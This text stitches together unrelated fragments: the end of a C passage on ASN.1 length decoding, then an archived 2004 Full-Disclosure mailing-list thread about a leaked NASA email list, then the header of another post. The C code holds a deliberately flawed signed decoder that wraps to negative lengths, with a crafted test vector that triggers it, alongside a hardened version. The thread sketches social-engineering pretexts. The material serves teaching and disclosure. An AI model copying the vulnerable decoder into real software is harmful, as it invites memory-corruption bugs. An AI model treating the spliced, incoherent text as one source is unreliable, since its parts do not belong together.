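 * memcpy(dst, src, len) is working from a nonsensical size. The -1 used
 * for a truncated header is indistinguishable from a decoded negative
 * length, which is part of the problem. */
int asn_length_signed(const unsigned char *buf, size_t buflen)
{
    unsigned int n, acc = 0, i;
    if (buflen < 1)
        return -1;
    n = buf[0];
    if (!(n & 0x80))
        return (int)n;                 /* short form: 0..127 */
    n &= 0x7f;
    if (n + 1 > buflen)
        return -1;
    for (i = 0; i < n; i++)
        acc = (acc << 8) | buf[1 + i]; /* silently wraps past 32 bits */
    return (int)acc;                   /* sign flips for values >= 2^31 */
}

/* Hardened decoder. On success stores the content length in *len and the
 * header size in *hdr and returns 0. Returns -1 for a truncated header,
 * the indefinite form (0x80), more length octets than size_t can hold,
 * or a length larger than the bytes left in the packet, so nothing
 * downstream can allocate or copy on the strength of a bogus value. */
int asn_parse_length(const unsigned char *buf, size_t buflen,
                     size_t *len, size_t *hdr)
{
    size_t n, v = 0, i;
    if (buflen < 1)
        return -1;
    if (!(buf[0] & 0x80)) {
        *len = buf[0];
        *hdr = 1;
    } else {
        n = buf[0] & 0x7f;
        if (n == 0 || n > sizeof(size_t) || n + 1 > buflen)
            return -1;
        for (i = 0; i < n; i++)
            v = (v << 8) | buf[1 + i];
        *len = v;
        *hdr = 1 + n;
    }
    if (*len > buflen - *hdr)          /* content must fit in the packet */
        return -1;
    return 0;
}

/* Whole-TLV helper: validates the length first and only then hands back
 * a pointer to the content octets (NULL on any error). */
const unsigned char *asn_content(const unsigned char *tlv, size_t tlvlen,
                                 size_t *content_len)
{
    size_t len, hdr;
    if (tlvlen < 1 || asn_parse_length(tlv + 1, tlvlen - 1, &len, &hdr) != 0)
        return NULL;
    *content_len = len;
    return tlv + 1 + hdr;
}

/* Constructed vectors. */
const unsigned char vec_short[]     = {0x03, 'a', 'b', 'c'};
const unsigned char vec_long[]      = {0x81, 0x05, 1, 2, 3, 4, 5};
const unsigned char vec_negative[]  = {0x84, 0x80, 0x00, 0x00, 0x10};
const unsigned char vec_short_pkt[] = {0x05, 'a'};        /* claims 5, has 1 */
const unsigned char vec_indef[]     = {0x80};
const unsigned char vec_tlv[]       = {0x04, 0x02, 'h', 'i'}; /* OCTET STRING */

/* 1 if buf decodes to exactly (want_len, want_hdr), else 0. */
int decodes_to(const unsigned char *buf, size_t buflen,
               size_t want_len, size_t want_hdr)
{
    size_t len = 0, hdr = 0;
    return asn_parse_length(buf, buflen, &len, &hdr) == 0 &&
           len == want_len && hdr == want_hdr;
}

/* 1 if the hardened decoder rejects buf, else 0. */
int rejected(const unsigned char *buf, size_t buflen)
{
    size_t len = 0, hdr = 0;
    return asn_parse_length(buf, buflen, &len, &hdr) == -1;
}

int main(void)
{
    size_t n = 0;
    printf("signed decoder sees %d for 84 80 00 00 10\n",
           asn_length_signed(vec_negative, sizeof vec_negative));
    printf("hardened decoder rejects it: %d\n",
           rejected(vec_negative, sizeof vec_negative));
    printf("content of 04 02 68 69 is %zu bytes\n",
           asn_content(vec_tlv, sizeof vec_tlv, &n) ? n : 0);
    return 0;
}
```

The check that matters most is the last one in asn_parse_length(): a length is only usable once it has been compared against the bytes actually present, which is exactly the comparison a signed accumulator defeats when the value has gone negative.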



 
Re: [Full-Disclosure] why o why did NASA do this.

From: GuidoZ (uberguidozgmail.com)
Date: Fri Oct 29 2004 - 01:00:29 CDT


> Ok Mr. Limpy..lol

Just for the record, I fixed that problem I was having with my Linux
install! Of course, I've gone and broken it again, but that's beside
the point. Now you should be referring to me as Mr. No Limbs (it's
completely dead). lol

> Great point about the "career" job. Even if they aren't there, knowing a
> time and a name can get you more information out of a person in another
> dept, I think. I wouldn't try =)

I thought it was too. =D I wouldn't try it either, but then again, I'm
not someone who would be interested in hacking into NASA. It's the
ones who WOULD be interested that I worry about.

I realize that such information is generally available through public
records and such. However, that's no reason to post it all for easy
access and saving. ;)

--
Peace. ~G

On Tue, 19 Oct 2004 12:59:37 -0500, Todd Towles
<toddtowlesbrookshires.com> wrote:
>
> GuidoZ wrote:
> > =) Yeah, I do. I wasn't sure if you were having a brain fart
> > or something. lol
> Ok Mr. Limpy..lol
>
> > Well said. It was finally removed from public view, though
> > I'd imagine quite a few saved it just in case (myself
> > included). No, it's not some perfect list for every malicious
> > purpose, though it's certainly better than nothing. Spammers
> > really don't care if it's active or not - they will still
> > sell it. Social Engineering can go a long way though. It's
> > entirely possible someone that worked at NASA in 1996 would
> > be there still today. It's called a career. =)
> Great point about the "career" job. Even if they aren't there, knowing a
> time and a name can get you more information out of a person in another
> dept, I think. I wouldn't try =)
>
> -Todd
>
> > --
> > Peace. ~G
> >
> >
> > On Tue, 19 Oct 2004 07:59:36 -0500, Todd Towles
> > <toddtowlesbrookshires.com> wrote:
> > > I meant this outdated NASA e-mail list. I understand that FD
> > could be
> > > used for this purpose.
> > >
> > > The fact that NASA just hands you this information
> > (outdated or not)
> > > is pretty sad. As I stated before it is free information leakage at
> > > best and because it is outdated it should be removed from
> > public view.
> > > This could be used for social attacks and e-mail attacks. I don't
> > > think SPAMmers care about some 6 year old list but hackers
> > would. Any
> > > information that they can get free of charge is just that
> > much better.
> > >
> > > You know me better than that GuidoZ .....lol
> > >
> > > > -----Original Message-----
> > > > From: GuidoZ [mailto:uberguidozgmail.com]
> > > > Sent: Tuesday, October 19, 2004 1:24 AM
> > > > To: Todd Towles
> > > > Cc: full-disclosurelists.netsys.com
> > > > Subject: Re: [Full-Disclosure] why o why did NASA do this.
> > > >
> > > > > how would this list help me spam?
> > > >
> > > > Google your email address - then simply use a bot to
> > gather ALL the
> > > > email addresses listed in the posts along with it. ;) The
> > sad fact
> > > > is that the email addresses used to post to this list (and any
> > > > others like it) are freely there for the taking. Plus, it's quite
> > > > obvious they are active. (More obvious than, say, email
> > addies from
> > > > 1996?) ;)
> > > >
> > > > --
> > > > Peace. ~G
> > > >
> > > >
> > > > On Mon, 18 Oct 2004 11:02:00 -0500, Todd Towles
> > > > <toddtowlesbrookshires.com> wrote:
> > > > > Exactly as I stated earlier...this is just information
> > > > leakage...old
> > > > > as it might be, it helps...the people on the list are just
> > > > doing their
> > > > > jobs...getting paid and giving information to an employee that
> > > > > knows their name (and is higher in the company) seems harmless.
> > > > Spam isn't
> > > > > the issue with this information leakage, I can buy a CD
> > > > with 6 million
> > > > > e-mail address on it...how would this list help me spam?
> > > > >
> > > > >
> > > > >
> > > > > > -----Original Message-----
> > > > > > From: full-disclosure-adminlists.netsys.com
> > > > > > [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> > > > > > KF_lists
> > > > > > Sent: Monday, October 18, 2004 9:06 AM
> > > > > > To: Harry de Grote
> > > > > > Cc: full-disclosurelists.netsys.com
> > > > > > Subject: Re: [Full-Disclosure] why o why did NASA do this.
> > > > > >
> > > > > >
> > > > > > Forget about the spammers, how about social engineers.
> > > > This is quite
> > > > > > the gold mine for that.
> > > > > >
> > > > > > Hi this is Joe Schmoe from building 69 I need to have my
> > > > > > password reset.
> > > > > > -KF
> > > > > >
> > > > > >
> > > > > > >
> > > > > > > i have to admit... it's pretty old and useless, but i think
> > > > > > this may
> > > > > > > be a nice place for spammers to try out some new addresses...
> > > > > > >
> > > > > >
> > > > > >
> > > > >
> > > > >
> > > >
> > >
> >
>



 
[Full-Disclosure] Re: Thank you!

From: Nick (nickvirus-l.demon.co.uk)
Date: Fri Oct 29 2004 - 15:13:47 CDT